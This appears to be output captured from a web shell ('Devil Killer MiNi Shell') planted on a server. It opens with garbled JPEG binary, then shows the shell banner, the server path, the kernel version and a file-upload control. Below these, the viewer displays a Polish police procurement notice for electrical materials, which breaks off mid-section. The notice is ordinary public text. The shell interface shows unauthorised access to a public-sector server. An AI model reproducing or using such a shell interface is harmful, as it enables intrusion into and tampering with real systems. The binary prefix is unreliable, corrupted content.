JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251013/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251013/0047126201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa materiałów elektrycznych w ilościach i zgodnie z wymaganiami określonymi w załączniku nr 1.1 do SWZ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 930156216</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Podwale 31-33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-040</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">adam.balicki@wr.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dolnoslaska.policja.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa materiałów elektrycznych w ilościach i zgodnie z wymaganiami określonymi w załączniku nr 1.1 do SWZ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8cdaaf64-1a6c-41c4-b6d1-80cf80f800c0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00471262</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00035995/44/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.23 Dostawa materiałów elektrycznych.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kwp_wroclaw <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim za pośrednictwem platformazakupowa.pl (dalej jako „Platforma”) pod adresem: https://platformazakupowa.pl/pn/kwp_wroclaw <br/>2.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy: platformazakupowa.pl oraz poczty elektronicznej: adam.balicki@wr.policja.gov.pl, <br/>3.	W zakresie pytań technicznych związanych z działaniem systemu (Platformy) Zamawiający prosi o kontakt z Centrum Wsparcia Klienta platformazakupowa.pl pod numer 22 1010202, cwk@platformazakupowa.pl <br/>4.	Wymagania techniczne i organizacyjne opisane zostały w Regulaminie platformazakupowa.pl adres: https://platformazakupowa.pl/strona/1-regulamin</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5.	Zamawiający, zgodnie § 11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>5.1. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>5.2. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>5.3. zainstalowana dowolna przeglądarka internetowa, Uwaga – od dnia 17 sierpnia 2021 r., ze względu na zakończenie wspierania przeglądarki Internet Explorer przez firmę Microsoft, stosowanie przeglądarki Internet Explorer nie będzie dopuszczalne,<br/>5.4. włączona obsługa JavaScript,<br/>5.5. zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>5.6. szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>5.7. oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Zamawiający zgodnie § 11 ust. 2 ww. rozporządzenia dopuszcza formaty przesyłanych danych oraz informuje, że maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB, natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB w formatach: .pdf, .xls, .xlsx, .doc, .docx, .txt, .rtf, .xps, .odt, .ods, .odp, .ppt, .pptx, .csv, .jpg, .jpeg, .tif, .tiff, .geotiff. .png, .svg, .wav, .mp3, .avi, .mpg, .mpeg, .mp4, .m4a, .mpeg4, .ogg, .ogv, .zip, .tar, .gz, .gzip, .7z, .html, .xhtml, .css, .xml, .xsd, .gml, ,rng, .xsl, .xslt. <br/>6.	Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>6.1. akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej platformazakupowa.pl w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>6.2. zapoznał i stosuje się do Instrukcji składania ofert dostępnej na stronie: https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga dołączenia katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 oraz art. 14 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; dalej: „RODO”) informujemy, że:<br/>a.	administratorem Pani/Pana danych osobowych jest Komendant Wojewódzki Policji we Wrocławiu, ul. Podwale 31-33, 50-040 Wrocław.<br/>b.	administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod.kwp@wr.policja.gov.pl, tel. 47 8713598<br/>c.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji art. 275 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (tj. Dz.U. z 2021 poz. 1129 z późn. zm.) – dalej „PZP”.<br/>d.	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz 74 PZP<br/>e.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i ust. 4 PZP przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, a następnie w celu archiwalnym przez okres zgodny z instrukcją kancelaryjną i Jednolitym Rzeczowym Wykazem Akt. W przypadku zamówień współfinansowanych ze środków UE przez okres określony przepisami o przechowywaniu i archiwizacji dokumentów dotyczących projektów współfinansowanych z UE od dnia zakończenia postępowania o udzielenie zamówienia;<br/>f.	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje niepodania określonych danych wynikają z ustawy PZP i będą skutkować brakiem możliwości udzielenia Pani/Panu zamówienia (brakiem możliwości zawarcia umowy); <br/>g.	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>Posiada Pani/Pan:<br/>a.	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>a.	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b.	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c.	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; <br/>Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.<br/>Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.<br/>Informacja o ograniczeniach stosowania przepisów rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych):<br/>	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO, w tym w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania , o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PU-2380-161-061-160/2025/AB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa materiałów elektrycznych w ilościach i zgodnie z wymaganiami określonymi w załączniku nr 1.1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44111000-1 - Materiały budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31520000-7 - Lampy i oprawy oświetleniowe</p> <p class="mb-0">31530000-0 - Części lamp i sprzętu oświetleniowego</p> <p class="mb-0">44300000-3 - Kabel, drut i podobne wyroby</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">28 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">I.	O wyborze najkorzystniejszej oferty decydować będzie kryterium najniższej ceny.<br/>1.1.	Zgodnie z art. 247 ust. 1 PZP Zamawiający nie określa wagi tego kryterium.<br/>1.2. Zamawiający wybierze ofertę najkorzystniejszą spośród ofert niepodlegających odrzuceniu tworząc ranking ofert od oferty z najniższą ceną do oferty z ceną najwyższą. Po stworzeniu rankingu Zamawiający wybierze ofertę z najniższą ceną.<br/>1.3.	Jeżeli Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>1.4.	Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w SWZ.<br/>1.5.	Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>1.6.	W przypadku braku zgody, o której mowa wyżej, oferta podlega odrzuceniu, a Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.<br/>1.7.	Niezwłocznie po wyborze najkorzystniejszej oferty Zamawiający informuje równocześnie wszystkich wykonawców, którzy złożyli oferty o:<br/>1.7.1.	wyborze najkorzystniejszej oferty, podając nazwę albo imię i nazwisko, siedzibę albo miejsce zamieszkania, jeżeli jest miejscem wykonywania działalności wykonawcy, którego ofertę wybrano, oraz nazwy albo imiona i nazwiska, siedziby albo miejsca zamieszkania, jeżeli są miejscami wykonywania działalności wykonawców, którzy złożyli oferty, a także zaoferowane ceny,<br/>1.7.2.	wykonawcach, których oferty zostały odrzucone<br/>	podając uzasadnienie faktyczne i prawne. <br/>1.8.	Informację o wyborze oferty najkorzystniejszej Zamawiający niezwłocznie udostępni na stronie internetowej prowadzonego postępowania https://platformazakupowa.pl/pn/kwp_wroclaw, z zastrzeżeniem art. 253 ust. 3 ustawy Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Wg kolejności </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2.	Wykaz podmiotowych środków dowodowych. Zamawiający nie żąda na podstawie art. 273 PZP podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia oraz spełniania warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	Wykaz podmiotowych środków dowodowych. Zamawiający nie żąda na podstawie art. 273 PZP podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia oraz spełniania warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykonawcy ubiegający się o udzielenie zamówienia zobowiązani są dołączyć do składanej oferty przedmiotowe środki dowodowe potwierdzające, że oferowana dostawa spełnia określone przez Zamawiającego wymagania, cechy i kryteria.<br/>1.	Wykaz przedmiotowych środków dowodowych, które należy dołączyć do oferty:<br/>1.1.	Dla niżej wymienionych pozycji asortymentowych, wyszczególnionych także w formularzu asortymentowo-cenowym (załącznik nr 1.1 do SWZ) – Wykonawca ma obowiązek dołączyć do oferty dokumenty (przedmiotowe środki dowodowe), potwierdzające parametry oferowanego produktu, to jest deklaracje zgodności z CE, karty techniczne, karty charakterystyki, karty katalogowe, wydruki ze strony internetowej producenta lub inne równoważne dokumenty zawierające opis oferowanego produktu, potwierdzające zgodność wymaganych parametrów zgodnie z załącznikiem 1B do SWZ. Dokumenty te mają być opisane w sposób nie budzący wątpliwości do jakiego asortymentu są dedykowane: <br/>1)	poz. 1– Elektrozaczep rewersyjny 1411 12V DC,<br/>2)	poz. 2– Elektrozaczep rewersyjny 1411 RF12V DC,<br/>3)	poz. 3– Elektrozaczep zwykły 1410 12-24V AC/DC,<br/>4)	poz. 33– Oprawa LED biała, kwadratowa 24x24x8mm,<br/>5)	poz. 34– Oprawa LED biała, kwadratowa 30x30x8mm,<br/>6)	poz. 39– Oprawa LED rastrowa natynkowa 2x120cm,<br/>7)	poz. 40– Oprawa LED rastrowa natynkowa, 4x60cm, 60x60cm T8,<br/>8)	poz. 41– Oprawa LED rastrowa, podtynkowa 4x60cm, 60x60cm T8,<br/>9)	poz. 42– Panel Led 3200Lm 40W 120x30 z ramką N/T,<br/>10)	poz. 43– Panel Led 3200Lm 40W 60x60 z ramką NT,<br/>11)	poz. 47– Przedłużacz bębnowy 25 metrów, 4 gniazda 230 z klapką,<br/>12)	poz. 48– Przedłużacz bębnowy 30 metrów, 4 gniazda 230 z klapką,<br/>13)	poz. 49– Przedłużacz bębnowy 50 metrów, 4 gniazda 230 z klapką,<br/>14)	poz. 74– Rozdzielnica hermetyczna RH-12,<br/>15)	poz. 75– Rozdzielnica hermetyczna RH-24,<br/>16)	poz. 76– Rozdzielnica hermetyczna RH-6,<br/>17)	poz. 77– Rozdzielnica hermetyczna RH-8,<br/>18)	poz. 80– Świetlówka 18W,<br/>19)	poz. 81– Świetlówka 18W,<br/>20)	poz. 82– Świetlówka 36W,<br/>21)	poz. 83– Świetlówka 16W,<br/>22)	poz. 90 – Wyłącznik różnicowoprądowy,<br/>23)	poz. 91– Wyłącznik różnicowoprądowy,<br/>24)	poz. 92– Wyłącznik różnicowoprądowy,<br/>25)	poz. 93 –Wyłącznik nadprądowy,<br/>26)	poz. 94 –Wyłącznik nadprądowy,<br/>27)	poz. 108 – Żarówka LED 8-9W,<br/>28)	poz. 109 – Żarówka LED 13-15W,<br/>29)	poz. 110 – Żarówka LED 18-19W,<br/>30)	poz. 111 – Żarówka LED E14 8 W,<br/>31)	poz. 112 – Żarówka LED D18W/840,<br/>32)	poz. 113 – Żarówka LED 7W, E14,<br/>1.2.	Zamawiający informuje, iż zastrzega możliwość zwrócenia się do producenta lub przedstawiciela producenta o potwierdzenie parametrów technicznych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki 